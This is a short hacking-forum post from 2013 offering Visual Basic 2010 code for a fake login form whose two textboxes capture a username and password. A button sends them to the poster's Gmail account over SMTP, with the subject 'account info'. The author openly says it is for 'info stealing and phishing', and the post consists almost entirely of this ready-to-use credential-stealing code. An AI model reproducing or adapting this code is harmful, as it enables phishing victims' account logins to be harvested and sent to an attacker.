Login Register






Thread Rating:
  • 0 Vote(s) - 0 Average


Visual Basic 2010 email sender filter_list
Author
Message
Visual Basic 2010 email sender #1
you can use this for info stealing and phishing

you need:
2 textboxes
1 button

put this to the very top:
imports system.net.mail

button1 code:
Dim smtp as new SmtpClient()
dim mail as new mailmessage()
mail.to.add("youremailhere@gmail.com")
mail.from = new mailaddress("youremail@gmail.com")
mail.subject = "account info"
mail.body = "username: " & textbox1.text & " password: " & textbox2.text
smtp.credentials = new net.networkcredential("youremail@gmail.com", "your gmail password here")
smtp.enablessl = true
smtp.port = 587
smtp.Host = "smtp.gmail.com"
smtp.Send(mail)
msgbox("optional error/message")

Reply





Messages In This Thread
Visual Basic 2010 email sender - by theplayer232 - 08-18-2013, 10:07 AM



Users browsing this thread: 1 Guest(s)